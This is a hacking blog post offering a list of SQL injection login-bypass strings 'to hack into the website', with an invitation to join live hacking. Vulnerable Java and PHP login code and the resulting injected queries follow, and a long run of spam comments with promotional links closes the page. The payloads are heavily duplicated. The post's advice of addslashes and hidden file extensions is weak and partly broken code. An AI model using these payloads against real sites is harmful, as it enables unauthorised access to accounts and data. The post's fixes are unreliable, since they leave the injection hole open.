Here I am posting some of the SQL injection strings that you can use to hack into the website.
I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.
‘ or 0=0 –
‘ or 0=0 –’
‘ or 0=0 #
” or 0=0 –
” or 0=0 –’
‘” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
” or 1=1–
or 1=1–
‘ or a=a–’
‘ or a=a #
‘ or a=a–
‘ or “a”=”a
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or “a”=”a
‘ or 0=0 –’
‘ or 0=0 #
” or 0=0 –
” or 0=0 –’
‘” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
” or 1=1–
or 1=1–
‘ or a=a–’
‘ or a=a #
‘ or a=a–
‘ or “a”=”a
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
admin’–
‘ or 1=1–
‘” or 1=1–
‘ union select 1, ‘Eyeless’, ‘ez2do’, 1–
admin’–
administrator’–
superuser’–
test’–
‘ or 1=1–
‘” or 1=1–
‘ union select 1, ‘Eyeless’, ‘ez2do’, 1–
admin’–
administrator’–
superuser’–
test’–
This is the short list but these SQL injection strings are much powerful.
I have another hint :
Some of the SQL supporting system doesn’t support.
For example
” or “a”=”a
‘) or (‘a’='a
” or “a”=”a
‘) or (‘a’='a
on some databases one would work, other wouldn’t.. first one would enclose the username (or pass) in quotes… first it would CLOSE the quotes (making it “”) and then says.. or “a”=”a.. the last quote would be closeing the final a.. and “a”=”a” is always true, so that would be how it works
however, the second uses (‘Username’).. and changing it to say “(”) or (‘a’='a’)”
however, the second uses (‘Username’).. and changing it to say “(”) or (‘a’='a’)”
Enjoy the HACK DAY 
SQL Injection like this
Login Java Code
String userid = request.getParameter("userid");
String password = request.getParameter("password");
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
connection = DriverManager.getConnection("jdbc:odbc:projectDB");
query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password +"'";
PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();
if(users.next()){
//some thing here
}
else{
}
Injection Works like thisString password = request.getParameter("password");
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
connection = DriverManager.getConnection("jdbc:odbc:projectDB");
query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password +"'";
PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();
if(users.next()){
//some thing here
}
else{
}
query = "SELECT * FROM Users WHERE user_id ='' OR 1=1; /* AND password ='*/--'";
Login PHP Code;
Username = ' OR 1=1;//
Password = ....
$myusername=$_POST['usr'];
$mypassword=$_POST['pwd'];
$sql="SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";
$result=mysql_query($sql);
$count=mysql_num_rows($result);
if($count==1){
//some code
}
else {
}
Injection Works like this$mypassword=$_POST['pwd'];
$sql="SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";
$result=mysql_query($sql);
$count=mysql_num_rows($result);
if($count==1){
//some code
}
else {
}
$sql="SELECT * FROM users WHERE user=''OR 1 = 1;//' and password='....'";
How to avoid these mistakes Use addSlashes() function adding slashes(/) to the string in java and php
//Java Code
addSlashes(String userid);
// PHP Code
$myusername=addslashes($_POST['usr'];);
Hacker is intelligent than programmer. So always hide the file extension (eg: *.jsp,*.php,*.asp).addSlashes(String userid);
// PHP Code
$myusername=addslashes($_POST['usr'];);
http://xyz.com/login.php to http://xyz.com/login
http://xyz.com/login to http://xyz.com/signin.do
In Java redirect this URL links using Web.xml file and inn php write .htaccess file in root directory.
By Kaila Piyush
My Google Profile HackingArticles4all.blogspot.com
These are actually wonderful ideas in on the topic of blogging.
ReplyDeleteYou have touched some fastidious things here. Any way keep up wrinting.
Look into my blog post hack twitter
What's up, its good piece of writing concerning media print, we all be aware of media is a enormous source of data.
ReplyDeleteFeel free to visit my web blog - sharecash downloader 2013
What i don't realize is in fact how you're not actually much more well-preferred than you
ReplyDeletemight be now. You're so intelligent. You realize thus significantly relating to this matter, made me individually imagine it from a lot of various angles. Its like men and women aren't involved except it's one thing to accomplish with Lady gaga! Your personal stuffs great. All the time maintain it up!
Have a look at my blog post: windows password recovery tool
Hi there! This is my first comment here so I just wanted to give a quick shout out and say I
ReplyDeletetruly enjoy reading through your articles. Can you suggest any other blogs/websites/forums that cover the same subjects?
Appreciate it!
Visit my website - lady gaga tour 2012
whoah this blog is wonderful i really like reading your posts.
ReplyDeleteKeep up the great work! You already know, many individuals are hunting around for this information, you
could help them greatly.
Here is my page - Dubstep
Excellent post. Keep writing such kind of information on your blog.
ReplyDeleteIm really impressed by it.
Hello there, You've done an excellent job. I'll certainly digg it and in my opinion suggest
to my friends. I am sure they'll be benefited from this site.
Look into my site :: Twitter password
Admiring the time and effort you put into your site
ReplyDeleteand in depth information you present. It's good to come across a blog every once in a while that isn't the same unwanted rehashed material.
Fantastic read! I've saved your site and I'm adding
your RSS feeds to my Google account.
Here is my webpage - funny drawings pictures
These are really impressive ideas in on the
ReplyDeletetopic of blogging. You have touched some good points here.
Any way keep up wrinting.
Feel free to surf to my webpage Funny cartoon cat pictures
When we choose to do the opposite of nothing, then
ReplyDeletewe can do something to help others and make a difference.
Leveling up to defeat all the enemies can be time arresting so apprehend
to absorb a acceptable bulk of hours anniversary day accepting the a lot of out of this game.
In addition, you can save the effort of coding the store functionality, virtual goods dependencies, billing interfaces and rewards.
my web-site: port saint lucie florida
She loves to share hers positive and negative experiences, and staying at , booked through chilloutbali.
ReplyDeleteIf you own a Black - Berry 9550 Storm 2, Black - Berry Curve 8530,
Black - Berry Tour 9630, Black - Berry Storm 9530, Black - Berry Curve 8330, Black - Berry World 8830, Black - Berry Pearl Flip 8230,
or Black - Berry Pearl Flip 8130, then you can listen to nearly a thousand songs on a single
micro - SD card. We are literally not the same person we were a minute ago, let alone a day, a month or a year ago.
My page - chillout - toryybhpejh.skyrock.com
If with the classic version, you only get to play the same game over and over again, with Simon 2 game, you
ReplyDeleteget to play more games with more challenges ad game highlights.
By obtaining increasingly more favour using their company people in your social settings, the more handle
you will need to acquire what you would like, and thru The particular Coalition Game you have just about
the most effective tips for hypnotherapy that gives you the talent to ensure that you influence other folks.
Online gaming is a popular way to spend enjoyable time at a low cost for hours on end.
Take a look at my blog http://oedady.com/url/profile/Katrina02
They want to win by playing their very best as opposed to winning by putting the other person off.
ReplyDeleteJust last year Apple sold more than one hundred million i - Phone
and i - Pad apps. You can only acquire a small amount of in-game money or gold,
and cannot participate in the auction house, send mail, join guilds, or even whisper to someone unless someone whispers to you first.
Also visit my webpage; long beach condominiums
After a long hectic busy day, games plays an important role to relax frayed nerves, scorched eyes
ReplyDeleteand tired ears. No two classes are created equally in
World of Warcraft and Zygors leveling guide will
pinpoint the most suitable build type and questing route based upon the class
you're playing. In the game, players should be able to able to make use of a slingshot in order to start the birds.
Here is my web site - spiele spielen
If you are receiving a fatal exception error message or BSOD with error message while installing or playing Real - Arcade
ReplyDeletegames, take note of the stop error code and then temporary disable
avast or turn on Gaming or Silent mode in
the Avast progr am. No two classes are created equally in World of Warcraft and Zygors leveling guide
will pinpoint the most suitable build type and questing route based upon the class you're playing. In the game, players should be able to able to make use of a slingshot in order to start the birds.
Also visit my blog post http://naturaltalented.wordpress.com/2013/05/02/but-there-are-also-online-arcade-games-for-kids-puzzle-games-for-kids-free-online-trivia-games-and-more/
Both drugs have also been denied FDA approval the first
ReplyDeletetime around and are awaiting news on their second attempt.
In fact, I always suggest to those overweight vegetarians to keep to a max of 4 pounds
a week so you won't suffer loose skin post weight loss. Many people don't have the time to weight themselves
every day, but checking the scale on a regular basis can definitely help when you're working to lose weight and keep it off.
Take a look at my web-site www.fathvereniging.nl
In most cases they are, but when it comes to updates, patches, etc to the mmorpgs.
ReplyDeleteWhile having a passion for playing games is important, getting a rewarding career in game design will require students to be a cut
above the competition. It is recommended that
the golfers select those putters with which the golfers feel good and works well with their gaming pattern.
Also visit my page - Visitar Site
The WWE Wrestle - Mania 29 live stream online and televised Pay-Per-View arrives to the
ReplyDeletepro wrestling world on Sunday, April 7, with plenty of big name stars in the matches.
There is little censorship and any one can put up anything almost on the site as
long as it is legal and could be viewed by adults of a legal
age. These videos might be personal, songs, motion picture scenes, training videos and so forth.
Here is my web-site - http://youtube-views-kaufen.de/
This is more important than ever in a world where there are dozens
ReplyDeleteof different audio formats. Hardware mechanisms used
in the manufacturing of a Wi - Fi internet radio system is less complicated and the point of ergonomics is kept in mind by the manufactures.
Another radio commercial production tip to
chew on is to make sure the audio quality is excellent on
any spot your produce.
Also visit my webpage xm radio onyx docking station
If, at the end of this time period, the score is
ReplyDeletetied, there are two options the officials can
take. By obtaining increasingly more favour using their company people in your social settings, the more handle you will need to acquire what you would like, and
thru The particular Coalition Game you have
just about the most effective tips for hypnotherapy that gives you the talent to
ensure that you influence other folks. Most video game testers reported that their salary
falls between $15,000 and $55, 000 in a year.
Feel free to surf to my site :: bgvideo.com
If it is lower the Studio365 will tell you and let you know that it will not sound well.
ReplyDeleteUnlike broadcast radio which is an audio-only medium, Internet radio stations
are free to offer interactive programming and can include images,
animation, and even video. They explained how banners
are bought via a network so they get low CPMs, an obscene amount of views and a good click-through ratio.
Have a look at my blog :: www.crisisenergetica.org
She is likely a WARRIOR PERSONALITY I talk about in the KWML Mastery Course
ReplyDeleteon women, dating, love, and friendship. This way you are not disappointed when you get residence,
and you won't have to make a excursion back to the shop. It fizzles as the lights go out, and she says it's been great talking to
you.
Look at my web blog; mouse click the up coming website page
Both drugs have also been denied FDA approval the first time around and are awaiting news on their second attempt.
ReplyDeleteVitamin B3 or also called as Niacin is important in weight loss because it is responsible for the regulation of thyroid hormones and also in sugar levels in the
body. The institution has persistently offered ideal
programs and services for those struggling to achieve certain levels of body weight.
Feel free to surf to my homepage: http://www.5-10kgabnehmen.de
If you find it a bit maddening to follow the daily fluctuations of the scale even though you are eating
ReplyDeleteproperly, pick three days of the week on which you will always weigh yourself (for example, Monday,
Wednesday, and Friday). Anyone who dares to make a closer inspection will find
the underlying difference. Do not be tempted to lose weight as quickly as you can, because a crash diet will have you eating less than
a thousand calories a day slowing down your metabolism.
Also visit my web blog - http://economyinsight.co.kr/news/articleView.html?idxno=219
Wallace explained the importance of nature by explaining the relationship between the Man and Nature.
ReplyDeleteOnce she moved 1931 to Krakow with her family, she lived and
worked there since her death in February of last year. Wedding poetry can be used
during wedding toasts, and if you find the right balance, it can make a big difference.
My web blog; http://northerncalifornia.dirtdujour.com/member/65119
A little bit of care, concern and love will go a long way to make him feel bound
ReplyDeletewith you. These are reaching thousands of people at a time who recognize the self help benefits and pass them on to friends
who do the same and they become viral. There are many famous author
books published on poems.
If you cannot write love poems for your guy, don't be disappointed easily. From ancient Britain come romantic love poems of forbiddin trysts in black forests and aristocratic romance between knights and fair maidens. Remember fall in love poems should say the exact thing you feel without hesitation and fear of being embarrassed, either you write fall in love poems yourself or choose from the famous fall in love poems.
ReplyDeleteThough the levels look really simple, they are actually
ReplyDeletequite challenging. It is an adventurous game filled with fun and excitement.
You can only acquire a small amount of in-game money or gold, and cannot
participate in the auction house, send mail, join guilds, or even whisper to someone unless
someone whispers to you first.
Also visit my weblog www.sosd.org
Generally I don't read post on blogs, but I would like to say that this write-up very compelled me to try and do so! Your writing taste has been surprised me. Thank you, very nice article.
ReplyDeleteMy webpage: twitter password
(Game scheduled for December 15th with Utah State playing Toledo).
ReplyDeleteUnderstanding video gaming is a must tip on how to run a game store.
In addition, you can save the effort of coding the store functionality, virtual goods dependencies, billing interfaces and
rewards.
Take a look at my weblog ... www chasebank com **
Oh I see! I thought you haԁ this down аs an optional
ReplyDeletefoοliѕh addіtion.
Here is my website :: personal loans uk
In other trick taking games, players can take tricks on a number of kind of
ReplyDeletecontract. The player who spins the coin is referred to as the spinner.
It sounds like you log into the game and join a "Shadow war"
server and play with hundreds of other players within that PVP
world, but that world is different from the cooperative
Arkfall boss hunting world.
Here is my web blog; click through the next website
I cover my freshly sharpened hook with paste and coat the hair and bait in paste.
ReplyDeleteHere is some helpful information so you can select a good charter boat and avoid a few of the pitfalls.
When the water arrives at the inlet, most oxygen
is dissolved because of the abrupt transformation of water
movement.
My site: http://www.Nvcc.com
clients, Rachel, who got back together with her ex.
ReplyDeleteAll spaceship game leveling systems are designed slightly differently, but there are some general concepts that
apply to all games in this genre. For the purposes of this game, a "set" is
at least three cards of equal value such as three Jacks or three fours and a "sequence"
is made up of at least four cards that are of the same
suit and run sequentially such as three, four, five, and
six of spades.
Visit my web site ... click the up coming site
Break your 3 normal main meals into 5 smaller portion sizes - morning, snack,
ReplyDeletelunch, snack, dinner. Withdrawal from levothyroxine can be done but it takes 6 weeks of withdrawal for the remaining
thyroid tissue to be completely starved. Many people don't have the time to weight themselves every day, but checking the scale on a regular basis can definitely help when you're working to lose weight and
keep it off.
My blog post ... http://www.forumhertfordshire.co.uk/index.
php/member/399/ []
The same test can be performed while on the shower. From ancient Britain come romantic love poems of forbiddin trysts in black
ReplyDeleteforests and aristocratic romance between knights and fair maidens.
However, believe it or not poems () about getting back together
actually can be quite powerful when attracting your ex back into your life.
Both drugs have also been denied FDA approval the first time around and are awaiting news on
ReplyDeletetheir second attempt. It’s old news that tracking food intake
could lead to losing a few pounds [2]. Who does not need that little
bit of elevation when trying to diet.
My webpage simply click the following web site ()